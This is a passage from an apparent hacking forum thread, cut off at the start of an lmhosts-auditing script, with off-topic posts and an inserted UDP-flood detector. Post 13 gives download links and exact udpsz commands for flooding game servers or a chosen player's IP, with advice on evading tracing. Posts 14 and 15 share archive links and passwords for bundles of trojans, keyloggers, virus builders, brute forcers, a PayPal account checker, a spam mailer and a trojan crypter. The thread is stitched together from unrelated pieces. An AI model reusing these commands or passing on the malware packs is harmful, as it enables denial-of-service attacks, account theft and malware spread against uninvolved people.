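        name = decode_netbios_name(raw_name[1:-1]) if quoted else raw_name.upper()
        flags = rest.split()
        entry = HostEntry(ip=ip, name=name,
                          preload=any(f.upper() == '#PRE' for f in flags))
        for f in flags:
            if f.upper().startswith('#DOM:'):
                entry.domain = f[len('#DOM:'):]
        if quoted and len(name) != 16:
            audit.findings.append(
                f'line {lineno}: quoted name is {len(name)} bytes, NetBIOS names are 16')
        if entry.domain:
            audit.findings.append(
                f'line {lineno}: {entry.name} pinned as domain controller for '
                f'{entry.domain} at {ip}')
        audit.hosts.append(entry)
    return audit


if __name__ == '__main__':
    for finding in parse_lmhosts(SAMPLE_LMHOSTS).findings:
        print(finding)
```

    Run it against %SystemRoot%\System32\drivers\etc\lmhosts on a machine you suspect; every #DOM: pin and every remote #INCLUDE should be one you can account for.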

  10. How many times I've read the same thing:

    you guys are the best

    wow, what an awesome forum

    I heard the forum is really great (how clever this Google is)

    and other stuff like that

    it's not for some of you, it's for those annoying people who come in, take the programs to put them on other forums, and otherwise just sit and watch and post a bit in Off Topic and in Welcome

    you're pathetic

    stop lying

    nobody believes you ;)

    this isn't aimed at Kre@tor; whoever it applies to knows it

  11. =)) soon you'll be building a park in the courtyard of your block... you just have to steal some swings, seesaws, slides, and to get a drinking fountain, steal some pipes and hook up to the water mains (so you have water to drink, if nothing else) and done... a park made from other parks :))
  12. - part 1

    - budai beer rilouded

    you'll laugh until you shit yourself, this is for whoever hasn't seen Apropo TV ;) or for whoever hasn't seen them on YouTube

    part one has passed 150,000 (yes, I got the zeros right) views, the biggest on YouTube ;) supposedly...

    SHI FAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAASHI????????????????

  13. By accident I came across a little program that works on UDP ports (just like Counter Strike). What does this little program do? It sends a very large amount of data continuously, forever, and causes huge lag. It wasn't created for this, but... I had a feeling it would work if I tried.

    Be very careful: if you use it from your own PC you may get into trouble, because your real IP will show up. And yes, it works on any Counter Strike server and probably has an effect on any application that uses the UDP protocol.

    You can download the program from here: http://aluigi.altervista.org/testz/udpsz.zip (right-click the link and Save As... otherwise the download won't start)

    or from here: http://rapidshare.com/files/30616931/udpsz.zip.html

    Use the following syntax:

    Code:

    udpsz -l 0 hostname.domeniu.ro 27015 55555

    Or, if you want a player to have heavy lag or to be unable to connect to ANY server, put in their IP and port 27005

    Example:

    Code:

    udpsz -l 0 212.1.1.1 27005 55555

    Replace hostname.domeniu.ro with the server you want to hit, or 212.1.1.1 with the IP of the player you want to flood individually.

    It worked for me.
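    Added example (editor's code, not part of the post above and unrelated to the udpsz tool itself): the defensive side of what the post describes. A UDP flood against a game port is a per-source rate anomaly, so the detector below keeps a sliding one-second window per (source IP, destination port) and raises one alert per source the first time it exceeds a packet-rate or byte-rate limit. The packet records are constructed for the example (two normal clients plus one flooding source on port 27015), and the thresholds of 500 pkt/s and 1 MB/s are assumed values to be tuned per server, not figures from the post.

```python
from collections import defaultdict, deque
from dataclasses import dataclass
from typing import Deque, Dict, List, Tuple


@dataclass(frozen=True)
class Packet:
    ts: float       # arrival time in seconds
    src: str        # source IP
    dst_port: int   # UDP destination port
    length: int     # UDP payload length in bytes


def make_sample_packets() -> List[Packet]:
    """Constructed traffic for the example, not a capture from any real server:
    two game clients at 30 pkt/s for two seconds, plus one source that sends
    1000 large datagrams between t=0.5s and t=1.5s."""
    pkts: List[Packet] = []
    for i in range(60):
        t = i / 30
        pkts.append(Packet(t, '10.0.0.5', 27015, 120))
        pkts.append(Packet(t, '10.0.0.6', 27015, 96))
    for i in range(1000):
        pkts.append(Packet(0.5 + i / 1000, '203.0.113.9', 27015, 1400))
    pkts.sort(key=lambda p: p.ts)
    return pkts


def detect_udp_floods(packets: List[Packet], window: float = 1.0,
                      pps_limit: int = 500, bps_limit: int = 1_000_000
                      ) -> Dict[Tuple[str, int], Tuple[float, int, int]]:
    """Sliding-window rate check keyed by (source IP, destination port).
    Returns {key: (time of first alert, packets in window, bytes in window)}
    for every key that exceeds either the packet or the byte limit."""
    windows: Dict[Tuple[str, int], Deque[Packet]] = defaultdict(deque)
    bytes_in: Dict[Tuple[str, int], int] = defaultdict(int)
    alerts: Dict[Tuple[str, int], Tuple[float, int, int]] = {}
    for p in packets:  # packets must be in arrival order
        key = (p.src, p.dst_port)
        q = windows[key]
        q.append(p)
        bytes_in[key] += p.length
        while q and p.ts - q[0].ts > window:   # drop packets older than the window
            bytes_in[key] -= q.popleft().length
        if key in alerts:
            continue                           # report each source only once
        if len(q) > pps_limit * window or bytes_in[key] > bps_limit * window:
            alerts[key] = (p.ts, len(q), bytes_in[key])
    return alerts


if __name__ == '__main__':
    for (src, port), (ts, n, nbytes) in detect_udp_floods(make_sample_packets()).items():
        print(f'{ts:.3f}s  {src} -> udp/{port}: {n} pkts, {nbytes} bytes in window')
```

    Feeding it real data means replacing make_sample_packets() with records from a capture or flow log; the per-source key is what separates a flood from a busy but legitimate server, since ordinary clients sit far below either limit.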

  14. Trojans/Backdoors

    Trojan Horses

    - Yuri RAT v1.2

    - MofoTro v1.7 BETA

    - Charon

    - Beast v2.0.7

    - Omerta v1.3

    - Theef v2.10

    - Combined Forces R.A.T

    - MoSucker v3.0

    - ProRat v1.9 Fix2

    Keyloggers

    - Elite Keylogger v1.0

    - SKL v0.1

    - KeySpy v2.0

    - A++++

    - Curiosity

    - Keylogger

    - KeyCopy

    Binders

    - Daemon Crypt Public v2

    - NT Packer v2.1

    - EES binder v1.0

    - File Injector v3

    - Bytes Adder

    - FreshBind v2.01

    - YAB v2.01

    - NakedBind v1.0

    - Amok Joiner

    WebHacks/WordLists

    Brute Forcers

    - Munga Bunga's Official

    - Brutus - Authentication Engine Test 2

    - wwwHack v1.946

    - FTP Brute Hacker

    - FTP Brute Forcer.tar.gz - Unix

    - Wbrute.tar.gz - Unix

    - Shadow Scanner-Brute Forcer

    - Hackers Utility v1.5

    - POP3 brute forcer.tar.gz - Unix

    CGI-Bug Scanners

    - NStealth HTTP Security Scanner v5.8

    - Attack Toolkit v4.1 & source code included

    - Scanarator

    - Legion NetBios Scanner v2.1

    - NetView v1.0

    - CGI Vulnerability Scan

    - CGI Scanner v4.0

    - VoidEye CGI scanner

    Virus!

    Viruses

    - Hippi virus

    - Sasser

    - W32.Blaster.Worm

    - Midnight Massacre

    - 00001

    - Nimda

    - Loveletter virus

    - Happy '99

    - MXZ

    Virus Builders

    - DR VBS

    - VBSwg 2 beta - Virus builder

    - p0ke's WormGen 2.0

    - RESIDUO - DoS Virus

    MSN Hacks & Bots

    - HoaX Toolbox 1.1

    - MSN Extreme 3.0

    - MessenPass v1.06

    - Advanced Blood Scroller

    - Nudge Madness

    - Advanced Instant Messengers Password Recovery

    - Contact Spy

    - Msn Explosion

    - Encrypted Messenger

    Port & IP Scanners

    - Blues Port Scanner

    - ProPort v2.2

    - SuperScan v3.0

    - Net Scan Tools v4.2

    - LanSpy v2.0

    - Bitchin Threads v3.1

    - Trojan Hunter v1.5

    - SuperScan v4.0

    - Neotrace PRO v3.25 trial&crack

    Nukers And Flooders

    - Rocket v1.0

    - RPCNuke v1.0

    - Panther Mode1 - 56k

    - Panther Mode2 - ISDN +

    - Final Fortune v2.4

    - Battle Pong - Technophoria

    - Assault v1.0

    - ICMP Nuker

    - CLICK v2.2

    EXTRA!

    - Telnet Tutorial

    DOWNLOAD

    http://rapidshare.de/files/29727065/UltimateHacking2007.rar

    password

    errorised

  15. -MailerX = You can spam with email! (it contains an SMTP server)

    -PHP Attacker = a program that allows you to run exploits on a website (PHP)

    -PhpNuke = a program that allows you to do SQL injection on PHP-Nuke sites (IT WORKS, IT'S AWESOME)

    -PHP-Nuke_Hacker = a program that allows you to run exploits on any website, finding the exploits from www.milw0rm.com

    -IFRAME_DDoS_v1[1].0 = You can flood a website with multiple connections

    -Reuploaded = a webnuker for websites! (it works great)

    -ICMP DoS = You can flood a website

    -IP_Hider_v2[1].7_-xray- = a good one for hiding your IP (I am using it)

    -PP-checker = PayPal checker to hack PayPal accounts

    -BrutusAET2 Host by HybriD3_2 = one of the best brute-forcers ever

    -evilsmiley = an .exe file that makes an evil face with an evil smiley appear on your monitor, and you can't do anything (a funny one)

    -CSF-(c-sploiter final) = I'll let you check this one out yourself :-P

    -AntiDote_v1[1].2_osCE = To make a trojan undetected!

    -Nudge_Madness = basically an autoclicker

    -msn-nudger = it spams your contacts with nudges

    -YouTUBE_downloader_2.1.1 = you can download the videos on YouTube with this program

    -MEssBlackFrezzerBeta = You can freeze someone's account on MSN

    -bugs.txt = a text file that contains different bugs that a site could have...

    -sploof_v0.90.installer = a program to test a website's security...

    -proxylist.txt = contains proxies

    -proxies.txt = contains proxies

    -ipstealer = a shell that helps you steal someone's IP

    Password for AntiDote_v1[1].2_osCE is:
    osC++CoDeR

    Download: http://rapidshare.com/files/37798225/pack.rar

    I haven't seen this on the forum before, so enjoy.
